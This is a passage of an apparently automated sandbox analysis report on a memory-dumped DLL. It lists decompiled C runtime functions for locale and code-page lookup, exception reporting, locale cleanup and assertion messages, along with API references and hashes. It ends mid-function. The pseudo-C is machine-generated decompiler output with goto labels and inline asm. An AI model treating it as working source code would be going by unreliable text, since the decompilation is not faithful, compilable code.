Instruction Fuzzy Hash: B371F431610B02AAEB149FF5CC41BAB73BCEF59318F304869E6159B384EB72E565C760

Uniqueness

Uniqueness Score: -1.00%

Function 6EE52639, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EE52639(void* __ecx, signed int _a4, intOrPtr _a8) {
				char _v8;
				int _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t10 =  &_v8; // 0x6ee52957
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004, _t10, 2) != 0) {
						_t13 =  &_v8; // 0x6ee52957
						_t17 =  *_t13;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6EE3F8C7(_t23, _t23);
									goto L25;
								}
								_t6 =  &_v8; // 0x6ee52957
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b, _t6, 2) == 0) {
									goto L22;
								}
								_t9 =  &_v8; // 0x6ee52957
								_t17 =  *_t9;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,W)n,00000002,00000000,?,?,?,6EE52957,?,00000000), ref: 6EE526D2
GetLocaleInfoW.KERNEL32(?,20001004,W)n,00000002,00000000,?,?,?,6EE52957,?,00000000), ref: 6EE526FB
GetACP.KERNEL32(?,?,6EE52957,?,00000000), ref: 6EE52710

Strings

ACP, xrefs: 6EE52657
W)n, xrefs: 6EE526EC, 6EE52709, 6EE526C3, 6EE526DC, 6EE526C6, 6EE526EF
OCP, xrefs: 6EE5268D

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP$W)n
API String ID: 2299586839-2267789321
Opcode ID: 3f3402f8e05da9e59a4a716ee3082398802b521d5e893a124b5ab0adef61c886
Instruction ID: a41e4cee172f1ffc228c5751341930c866f802e3ba6175a6fe208a5fed2953cd
Opcode Fuzzy Hash: 3f3402f8e05da9e59a4a716ee3082398802b521d5e893a124b5ab0adef61c886
Instruction Fuzzy Hash: F421CF22624102AAE764CFD5D900A8773B6AF6CB68F328429E909DB304E773DD21C350

Uniqueness

Uniqueness Score: -1.00%

Function 6EE5280E, Relevance: 7.7, APIs: 5, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE5280E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0, signed int _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed int* _v24;
				short* _v28;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed int* _t46;
				signed int _t47;
				short* _t48;
				int _t49;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t65;
				int _t67;
				short* _t71;
				intOrPtr _t74;
				void* _t76;
				short* _t77;
				intOrPtr _t84;
				short* _t88;
				short* _t91;
				short** _t102;
				short* _t103;
				signed int _t105;
				signed short _t108;
				signed int _t109;
				void* _t110;

				_t127 = __fp0;
				_t39 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t39 ^ _t109;
				_t88 = _a12;
				_t105 = _a4;
				_v28 = _a8;
				_v24 = E6EE444CA(__ecx, __edx, __fp0) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6EE444CA(__ecx, __edx, __fp0);
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t91 = _t105 + 0x80;
				_t46 = _v24;
				 *_t46 = _t105;
				_t102 =  &(_t46[1]);
				 *_t102 = _t91;
				if(_t91 != 0 &&  *_t91 != 0) {
					_t84 =  *0x6ee62514; // 0x17
					E6EE527AD(_t91, 0, 0x6ee62400, _t84 - 1, _t102);
					_t46 = _v24;
					_t110 = _t110 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if(__eflags == 0) {
						goto L19;
					}
					E6EE5214F(_t91, _t99, __eflags,  &_v20);
					_pop(_t91);
					goto L20;
				} else {
					_t71 =  *_t102;
					if(_t71 == 0) {
						L8:
						E6EE52235(_t91, _t99, __eflags, _t127,  &_v20);
						L9:
						_pop(_t91);
						if(_v20 != 0) {
							_t103 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t108 = E6EE52639(_t91,  ~_t105 & _t105 + 0x00000100,  &_v20);
							__eflags = _t108;
							if(_t108 == 0) {
								L22:
								L23:
								return E6EE361A7(_v8 ^ _t109);
							}
							_t55 = IsValidCodePage(_t108 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
								 *_t57 = _t108;
							}
							E6EE44EE2(_v16,  &(_v24[0x94]), 0x55, _t103);
							__eflags = _t88;
							if(_t88 == 0) {
								L34:
								goto L23;
							}
							_t33 =  &(_t88[0x90]); // 0xd0
							E6EE44EE2(_v16, _t33, 0x55, _t103);
							_t65 = GetLocaleInfoW(_v16, 0x1001, _t88, 0x40);
							__eflags = _t65;
							if(_t65 == 0) {
								goto L22;
							}
							_t36 =  &(_t88[0x40]); // 0x30
							_t67 = GetLocaleInfoW(_v12, 0x1002, _t36, 0x40);
							__eflags = _t67;
							if(_t67 == 0) {
								goto L22;
							}
							_t38 =  &(_t88[0x80]); // 0xb0
							E6EE484EA(_t38, _t108, _t38, 0x10, 0xa);
							goto L34;
						}
						_t74 =  *0x6ee623fc; // 0x41
						_t76 = E6EE527AD(_t91, _t99, 0x6ee620f0, _t74 - 1, _v24);
						_t110 = _t110 + 0xc;
						if(_t76 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								goto L25;
							}
							goto L22;
						}
						_t77 =  *_t102;
						_t103 = 0;
						if(_t77 == 0) {
							L14:
							E6EE52235(_t91, _t99, __eflags, _t127,  &_v20);
							L15:
							_pop(_t91);
							goto L21;
						}
						_t123 =  *_t77;
						if( *_t77 == 0) {
							goto L14;
						}
						E6EE5219A(_t91, _t99, _t123, _t127,  &_v20);
						goto L15;
					}
					_t119 =  *_t71 - _t99;
					if( *_t71 == _t99) {
						goto L8;
					}
					E6EE5219A(_t91, _t99, _t119, _t127,  &_v20);
					goto L9;
				}
			}

APIs

Part of subcall function 6EE444CA: GetLastError.KERNEL32(?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?,?,6EDB28E8,?), ref: 6EE444CF
Part of subcall function 6EE444CA: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,6EE3ACF2,6EDB2A9E,?,?,?,?,?,6EDB2A5D,?,?), ref: 6EE4456D

Part of subcall function 6EE444CA: _free.LIBCMT ref: 6EE4452C
Part of subcall function 6EE444CA: _free.LIBCMT ref: 6EE44562

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6EE5291A
IsValidCodePage.KERNEL32(00000000), ref: 6EE52963
IsValidLocale.KERNEL32(?,00000001), ref: 6EE52972
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6EE529BA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6EE529D9

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 236c413d79ca733c5a67071d773a88e8ddcc00d5e6af6cbb660848ba58868556
Instruction ID: ca9d1b3e5a1e73484915f38fe6ddcb775c981fb77651b8ddcee1a02cc31001f3
Opcode Fuzzy Hash: 236c413d79ca733c5a67071d773a88e8ddcc00d5e6af6cbb660848ba58868556
Instruction Fuzzy Hash: E7518371A10206DFEF50DFE5CC50AAE73B8AF2D304F204869E914EB380DB729A558B61

Uniqueness

Uniqueness Score: -1.00%

Function 6EE37375, Relevance: 6.1, APIs: 4, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E6EE37375(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E6EE37490(_t34);
				 *_t60 = 0x2cc;
				_v632 = E6EE38EC0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E6EE38EC0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E6EE37490(_t49);
				}
				return _t49;
			}

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6EE37381
IsDebuggerPresent.KERNEL32 ref: 6EE3744D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6EE3746D
UnhandledExceptionFilter.KERNEL32(?), ref: 6EE37477

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: 89ac493865f36593ba4c4dd7ec46c69997f8fc77037bd3b09a810b8ab3769fc0
Instruction ID: 73a93d4db94939c602e28a730ef9abfd5bfa86beee19b5aeb6a5fcf08d32a425
Opcode Fuzzy Hash: 89ac493865f36593ba4c4dd7ec46c69997f8fc77037bd3b09a810b8ab3769fc0
Instruction Fuzzy Hash: 0B31F475D1522D9ADB10DFA4D989BCDBBB8AF08304F2045AAE409AA290EB755A84CF44

Uniqueness

Uniqueness Score: -1.00%

Function 6EE4E989, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EE4E989(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6ee77b80) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6EE4471C(_t46);
							E6EE50AF6( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6EE4471C(_t47);
							E6EE50FAA( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6EE4471C( *((intOrPtr*)(_t74 + 0x7c)));
						E6EE4471C( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6EE4471C( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6EE4471C( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6EE4471C( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6EE4471C( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6EE4EAFA( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6ee77ce8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6EE4471C(_t31);
							E6EE4471C( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6EE4471C(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6EE4471C(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6EE4E9CD

Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B13
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B25
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B37
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B49
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B5B
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B6D
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B7F
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50B91
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BA3
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BB5
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BC7
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BD9
Part of subcall function 6EE50AF6: _free.LIBCMT ref: 6EE50BEB

_free.LIBCMT ref: 6EE4E9C2

Part of subcall function 6EE4471C: RtlFreeHeap.NTDLL(00000000,00000000,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?), ref: 6EE44732
Part of subcall function 6EE4471C: GetLastError.KERNEL32(?,?,6EE5124B,?,00000000,?,?,?,6EE514EE,?,00000007,?,?,6EE4EB20,?,?), ref: 6EE44744

_free.LIBCMT ref: 6EE4E9E4
_free.LIBCMT ref: 6EE4E9F9
_free.LIBCMT ref: 6EE4EA04
_free.LIBCMT ref: 6EE4EA26
_free.LIBCMT ref: 6EE4EA39
_free.LIBCMT ref: 6EE4EA47
_free.LIBCMT ref: 6EE4EA52
_free.LIBCMT ref: 6EE4EA8A
_free.LIBCMT ref: 6EE4EA91
_free.LIBCMT ref: 6EE4EAAE
_free.LIBCMT ref: 6EE4EAC6

Strings

|n, xrefs: 6EE4EA75

Memory Dump Source

Source File: 00000003.00000002.305141648.000000006EDB1000.00000020.00020000.sdmp, Offset: 6EDB0000, based on PE: true

Associated: 00000003.00000002.305131062.000000006EDB0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305456775.000000006EE57000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.305496149.000000006EE6A000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.305519381.000000006EE77000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.305533176.000000006EE7A000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: |n
API String ID: 161543041-3370561121
Opcode ID: 6eb51edce57b71c3c17ea7c65c38a2f883622c18deca10fe3a3766d19a6ed3ec
Instruction ID: 30bf38494907228dc053a375dac325e71ac976ad843716dc3bb747ca8e3fd7b6
Opcode Fuzzy Hash: 6eb51edce57b71c3c17ea7c65c38a2f883622c18deca10fe3a3766d19a6ed3ec
Instruction Fuzzy Hash: 72315F71614A01DFEB61DEF8E848B967BE8BF01358F30481AE055DB3A5DB70E941DB10

Uniqueness

Uniqueness Score: -1.00%

Function 6EE3E828, Relevance: 21.4, APIs: 2, Strings: 10, Instructions: 403
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6EE3E828(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __fp0, char _a4, char _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20, char* _a24) {
				char _v0;
				signed int _v8;
				char _v12;
				char _v16;
				char _v532;
				signed int _v536;
				signed int _v540;
				WCHAR* _v544;
				signed int _v548;
				intOrPtr* _v552;
				WCHAR* _v556;
				intOrPtr _v576;
				intOrPtr* _v580;
				intOrPtr* _v584;
				intOrPtr* _v588;
				intOrPtr* _v592;
				intOrPtr* _v596;
				void* __ebp;
				signed int _t93;
				void* _t97;
				void* _t101;
				signed int _t102;
				void* _t119;
				void* _t121;
				void* _t122;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr _t130;
				void* _t132;
				void* _t133;
				void* _t134;
				void* _t135;
				void* _t137;
				void* _t138;
				void* _t139;
				intOrPtr _t140;
				intOrPtr _t141;
				void* _t145;
				void* _t146;
				void* _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t160;
				void* _t161;
				signed int _t162;
				WCHAR* _t164;
				char* _t165;
				char* _t166;
				char* _t169;
				char* _t170;
				void* _t173;
				void* _t174;
				char* _t176;
				char* _t177;
				void* _t179;
				void* _t181;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t186;
				void* _t188;
				signed int _t194;
				WCHAR* _t197;
				intOrPtr* _t198;
				signed int _t200;
				intOrPtr* _t202;
				intOrPtr* _t204;
				intOrPtr* _t207;
				void* _t211;
				void* _t215;
				intOrPtr* _t216;
				void* _t218;
				signed int _t219;
				char _t221;
				signed short* _t224;
				intOrPtr* _t226;
				signed int _t229;
				void* _t230;
				signed int _t234;
				void* _t236;
				void* _t237;
				void* _t240;
				void* _t286;

				_t286 = __fp0;
				_t214 = __edx;
				_t229 = _t234;
				_t93 =  *0x6ee77a68; // 0xa89efc87
				_v8 = _t93 ^ _t229;
				_t190 = _a24;
				_t226 = _a4;
				_t221 = _a8;
				_v552 = _a12;
				_v536 = _a16;
				_t97 = E6EE485D1(_t226, _t221, L"Assertion failed!");
				_v540 = _v540 & 0x00000000;
				_t236 = _t234 - 0x228 + 0xc;
				if(_t97 != 0) {
					L66:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6EE3AC93();
					asm("int3");
					_push(_t229);
					_t230 = _t236;
					_push(_t197);
					_push(_t197);
					E6EE3EDB5(_t190, _t221, _t226, _t286, _v584, _v580, _v576);
					_t101 = E6EE3ADD6(2);
					_t237 = _t236 + 0x10;
					_t102 =  *(_t101 + 0xc);
					__eflags = _t102 & 0x000004c0;
					if((_t102 & 0x000004c0) == 0) {
						_push(0);
						_push(4);
						_t119 = E6EE3ADD6(2);
						_t197 = 0;
						_push(_t119);
						E6EE41DAA(_t190, _t221, _t226, _t286);
						_t237 = _t237 + 0x10;
					}
					_push(0);
					_v12 = E6EE3EE64();
					_v16 = E6EE3ADD6(2);
					_push( &_a8);
					_push( &_a4);
					_push( &_v0);
					L70();
					E6EE41A50(_t190, _t197, _t221, _t226, _t286, E6EE3ADD6(2));
					E6EE3E6F4(_t190, _t197, _t214, _t221, _t226, _t286,  &_v16,  &_v12);
					asm("int3");
					_push(_t230);
					_push( *_v580);
					_push( *_v584);
					return E6EE3EF06( *_v596,  *_v592,  *_v588);
				} else {
					_t121 = E6EE4855C(_t226, _t221, L"\n\n");
					_t236 = _t236 + 0xc;
					if(_t121 != 0) {
						goto L66;
					} else {
						_t122 = E6EE4855C(_t226, _t221, L"Program: ");
						_t236 = _t236 + 0xc;
						if(_t122 != 0) {
							goto L66;
						} else {
							E6EE38EC0(_t221,  &_v532, _t122, 0x20a);
							_t240 = _t236 + 0xc;
							_v548 = 0;
							_t126 =  &_v548;
							__imp__GetModuleHandleExW(6, _t190, _t126);
							_t197 =  &_v532;
							_t190 = 0x105;
							asm("sbb eax, eax");
							_t128 =  ~_t126 & _v548;
							_v548 = _t128;
							if(GetModuleFileNameW(_t128, _t197, 0x105) != 0) {
								L6:
								_t190 =  &_v532;
								_t198 =  &_v532;
								_t214 = _t198 + 2;
								do {
									_t130 =  *_t198;
									_t198 = _t198 + 2;
								} while (_t130 != _v540);
								_t197 = _t198 - _t214 >> 1;
								if( &(_t197[5]) <= 0x40) {
									L10:
									_t132 = E6EE4855C(_t226, _t221, _t190);
									_t236 = _t240 + 0xc;
									if(_t132 != 0) {
										goto L66;
									} else {
										_t133 = E6EE4855C(_t226, _t221, "\n");
										_t236 = _t236 + 0xc;
										if(_t133 != 0) {
											goto L66;
										} else {
											_t134 = E6EE4855C(_t226, _t221, L"File: ");
											_t236 = _t236 + 0xc;
											if(_t134 != 0) {
												goto L66;
											} else {
												_t214 = _v536;
												_t200 = _t214;
												_t190 = _t200 + 2;
												do {
													_t135 =  *_t200;
													_t200 = _t200 + 2;
												} while (_t135 != _v540);
												_t197 = _t200 - _t190 >> 1;
												if( &(_t197[4]) <= 0x40) {
													_push(_t214);
													goto L35;
												} else {
													_t194 = _t214;
													_t211 = _t194 + 2;
													do {
														_t161 =  *_t194;
														_t194 = _t194 + 2;
													} while (_t161 != _v540);
													_v544 = 0x5c;
													_t190 = _t194 - _t211 >> 1;
													_t197 = 1;
													_t162 =  *(_t214 + _t190 * 2 - 2) & 0x0000ffff;
													if(_t162 != _v544) {
														_v556 = _t162;
														_t224 = _t214 - 2 + _t190 * 2;
														_t219 = _t162;
														while(_t219 != 0x2f && _t197 < _t190) {
															_t224 = _t224 - 2;
															_t197 =  &(_t197[0]);
															_t184 =  *_t224 & 0x0000ffff;
															_t219 = _t184;
															if(_t184 != _v544) {
																continue;
															}
															break;
														}
														_t221 = _a8;
														_t214 = _v536;
													}
													_t164 = _t190 - _t197;
													_v544 = _t164;
													if(_t164 <= 0x26) {
														L30:
														if(__eflags >= 0) {
															_push(0x23);
															_t165 = E6EE4871C(_t197, _t226, _t221, _t214);
															_t236 = _t236 + 0x10;
															__eflags = _t165;
															if(_t165 != 0) {
																goto L66;
															} else {
																_t166 = E6EE4855C(_t226, _t221, L"...");
																_t236 = _t236 + 0xc;
																__eflags = _t166;
																if(_t166 != 0) {
																	goto L66;
																} else {
																	_t197 = _v544;
																	_push(8);
																	_t169 = E6EE4871C(_t197, _t226, _t221, _v536 + _t197 * 2);
																	_t236 = _t236 + 0x10;
																	__eflags = _t169;
																	if(_t169 != 0) {
																		goto L66;
																	} else {
																		_t170 = E6EE4855C(_t226, _t221, L"...");
																		_t236 = _t236 + 0xc;
																		__eflags = _t170;
																		if(_t170 != 0) {
																			goto L66;
																		} else {
																			_t173 = _v536 + _t190 * 2 + 0xfffffff2;
																			goto L34;
																		}
																	}
																}
															}
														} else {
															_t174 = 0x35;
															_t197 = _t197 >> 1;
															_v556 = _t197;
															_push(_t174 - _t197);
															_t176 = E6EE4871C(_t197, _t226, _t221, _t214);
															_t236 = _t236 + 0x10;
															__eflags = _t176;
															if(_t176 != 0) {
																goto L66;
															} else {
																_t177 = E6EE4855C(_t226, _t221, L"...");
																_t236 = _t236 + 0xc;
																__eflags = _t177;
																if(_t177 != 0) {
																	goto L66;
																} else {
																	_t190 = _t190 - _v556;
																	__eflags = _t190;
																	_t173 = _v536 + _t190 * 2;
																	goto L34;
																}
															}
														}
													} else {
														if(_t197 >= 0x12) {
															__eflags = _t164 - 0x26;
															goto L30;
														} else {
															_t179 = 0x35;
															_push(_t179 - _t197);
															_t181 = E6EE4871C(_t197, _t226, _t221, _t214);
															_t236 = _t236 + 0x10;
															if(_t181 != 0) {
																goto L66;
															} else {
																_t182 = E6EE4855C(_t226, _t221, L"...");
																_t236 = _t236 + 0xc;
																if(_t182 != 0) {
																	goto L66;
																} else {
																	_t197 = _v544;
																	_t173 = _v536 + _t197 * 2;
																	L34:
																	_push(_t173);
																	L35:
																	_push(_t221);
																	_push(_t226);
																	_t137 = E6EE4855C();
																	_t236 = _t236 + 0xc;
																	if(_t137 != 0) {
																		goto L66;
																	} else {
																		_t138 = E6EE4855C(_t226, _t221, "\n");
																		_t236 = _t236 + 0xc;
																		if(_t138 != 0) {
																			goto L66;
																		} else {
																			_t139 = E6EE4855C(_t226, _t221, L"Line: ");
																			_t236 = _t236 + 0xc;
																			if(_t139 != 0) {
																				goto L66;
																			} else {
																				_t202 = _t226;
																				_t53 = _t202 + 2; // 0x32
																				_t215 = _t53;
																				do {
																					_t140 =  *_t202;
																					_t202 = _t202 + 2;
																				} while (_t140 != 0);
																				_t216 = _t226;
																				_t197 = _t202 - _t215 >> 1;
																				_t54 = _t216 + 2; // 0x32
																				_t190 = _t54;
																				do {
																					_t141 =  *_t216;
																					_t216 = _t216 + 2;
																				} while (_t141 != _v540);
																				_t214 = _t216 - _t190 >> 1;
																				_t145 = E6EE484EA(_t197, _a20, _t226 + (_t216 - _t190 >> 1) * 2, _t221 - _t197, 0xa);
																				_t236 = _t236 + 0x10;
																				if(_t145 != 0) {
																					goto L66;
																				} else {
																					_t146 = E6EE4855C(_t226, _t221, L"\n\n");
																					_t236 = _t236 + 0xc;
																					if(_t146 != 0) {
																						goto L66;
																					} else {
																						_t147 = E6EE4855C(_t226, _t221, L"Expression: ");
																						_t236 = _t236 + 0xc;
																						if(_t147 != 0) {
																							goto L66;
																						} else {
																							_t204 = _t226;
																							_t59 = _t204 + 2; // 0x32
																							_t218 = _t59;
																							do {
																								_t148 =  *_t204;
																								_t204 = _t204 + 2;
																							} while (_t148 != 0);
																							_t60 = (_t204 - _t218 >> 1) + 0xb0; // 0xde
																							_t214 = _t60;
																							_t207 = _v552;
																							_t190 = _t207 + 2;
																							do {
																								_t149 =  *_t207;
																								_t207 = _t207 + 2;
